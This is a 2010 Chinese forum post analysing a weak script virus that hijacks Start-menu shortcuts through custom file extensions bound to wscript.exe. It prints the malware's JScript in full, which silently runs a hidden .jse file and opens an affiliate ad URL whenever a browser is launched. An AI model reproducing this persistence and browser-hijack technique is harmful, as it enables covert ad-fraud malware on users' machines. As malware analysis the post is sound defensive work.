-
-
[原创]一个弱脚本病毒分析查杀
-
发表于: 2010-8-19 15:50
-
朋友说中了个病毒很烦 然后就帮她查看了一下。
用xuetr看了看 没发现什么异常
最后发现开始菜单下某个文件下的快捷方式都有两个,如图
。而且一点这个文件 就会在桌面生成淘宝的链接。(这些做淘宝客的人还挺恶心的)。
然后想 会不会是快捷方式指向病毒文件 运行病毒 然后再运行正确的文件。
然后把“快捷方式”拖到QQ里传到自己电脑上一看,是一个后缀很奇怪的文件(文件名卸载.psydckcvewon)。看这文件名 觉得是随机的 然后GOOGLE了一下 搜索不到 果然是随机的。
想到应该是自定义文件后缀 CMD下运行 assoc 和 ftype 一看 果然是自定义的文件后缀 指向
wscript.exe /B "%1"
/*1JQOUESBWBGZK = "unhnyksavqggjdgqugrqaprktpdddpkjik" ;
CJRWKKQEMVVJ = "vhuujpkkdhllgdrkoqbgcwkxgbtxlutrhk" ;
JLRKFHVOSMRY = "sokiahwedpwqjusrgkpcxofqkixgmbpltm" ;
WFSKZTFPUCFP = "swlmymuvkdsosuqinlxhdfvpnmwydvhyii" ;
NEOCKQHYCWLE = "aynhhixwvpuyppyfeedqkbpvnuidgndmpi" ;
*/var __x_abcd = new ActiveXObject("WScript.Shell");
__x_abcd.Run("wscript.exe /B \"C:\\Program Files\\Internt Explorer\\Windows Live\\EditPlus\\logoff.jse\" -run" , 0 , false ) ;
var __x_abhb="C:\\Program Files\\Kingsoft\\WPS Office Personal\\utility\\uninst.exe";
var __x_abgum="";
if (__x_abhb == ""){
WScript.Quit() ;
}
var __x_abce = new Array() ;
__x_abce.push( "MAXTHON.EXE") ;__x_abce.push( "THEWORLD.EXE") ;__x_abce.push( "IEXPLORE.EXE") ;__x_abce.push( "360SE.EXE") ;__x_abce.push( "SOGOUEXPLORER.EXE") ;__x_abce.push( "TTRAVELER.EXE") ;__x_abce.push( "FIREFOX.EXE") ;
var __x_abeo = function(__x_abfk){
var __x_abfkUpper = __x_abfk.toUpperCase();
for (var __x_abfj in __x_abce){
if (__x_abfkUpper.indexOf(__x_abce[__x_abfj]) > 0){
return true
}
}
return false
};
var __x_abcj =new Array() ;
__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn") ;__x_abcj.push( "http://www.80904.cn");
var __x_abck=__x_abcj[parseInt(Math.random() * __x_abcj.length)] ;
if (__x_abeo(__x_abhb)){
__x_abgum = "\"" + __x_abck + "\"" ;
}
__x_abcd.Run("\"" + __x_abhb + "\" " + __x_abgum, 1, false) ;
WScript.Sleep(5000);
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
